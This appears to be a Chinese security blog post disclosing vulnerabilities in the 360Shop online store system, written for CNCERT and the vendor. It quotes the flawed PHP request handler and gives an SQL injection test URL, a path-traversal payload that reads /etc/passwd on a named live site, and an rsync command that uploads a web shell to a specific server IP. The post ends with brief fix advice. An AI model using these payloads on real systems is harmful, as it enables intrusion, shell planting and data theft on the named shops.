您的位置 » 首页 » 实用工具 » 360Shop网店系统多个漏洞(含getshell)

360Shop网店系统多个漏洞(含getshell)

发表于4年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年09月30日 | 文章热度:5,592 次 全屏阅读

显示不全请点击全屏阅读

360Shop网店系统多个漏洞,部分漏洞可getshell。
详细说明:官网:http://www.360shop.com.cn
测试基于360Shop最新版本V3.0

使用这套系统的有独立的站点,如
http://www.iplaybox.net
http://www.lpxxw.net
也有托管给官方的网店,这个比较多,可能有几千个,如:
http://09pf.taodiantong.com
http://520mpai.taodiantong.com

1. SQL注入
测试地址:
http://www.iplaybox.net/?do=display&mod=goods&id=10839
Mysql错显Integer型注入,POST方法。

后台地址:http://www.iplaybox.net/admin/login.php

漏洞参数为 xajaxargs

function initProcessRequests()
{
$xajaxRequest = array();
$xajaxRequest[‘xajaxr’] = @$_GET[‘xajaxr’];
$xajaxRequest[‘xajax’] = @$_GET[‘xajax’];
// reset RequestMode
if(isset($_GET[‘xajax’]))
{
$_GET[‘xajax’] = null;
unset($_GET[‘xajax’]);
}
// get the upload file local path
foreach(array_keys($_FILES) as $name)
{
if(isset($_GET[$name]) && !isset($_POST[$name]))
{
$_POST[$name] = $this->_decodeUTF8Data($_GET[$name]);
}
}
$xajaxargs = array(get_original_data($_POST));
$xajaxRequest[‘xajaxargs’] = $xajaxargs;
$_POST = $xajaxRequest;
}

2. 本地文件包含。
http://www.iplaybox.net/?do=display&id=3653&mod=../../../../../../../../../../etc/passwd%00.jpg

普通用户没有上传点,后台上传的图片也都到了官方提供的服务器上了,漏洞比较鸡肋。

3. Rsync任意文件上传。
推测一些网店用的是360Shop官方提供的服务器,使用了同样版本的Linux,PHP和Nginx。其中部分服务器的Web目录直接Rsync可写,导致可直接上传Shell。

rsync.exe 360shop/shell.php root@121.52.224.82::lsa/admin

上传的shell。

目前网上貌似没有暴出该网店系统的漏洞,且网店和支付宝有接口,有撞库的可能。请cncert通知官方,依情况看是否要发布此漏洞~

修复方案:

1. 过滤。
2. Rsync设置验证。

Tags:

360Shop网店漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/1018/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)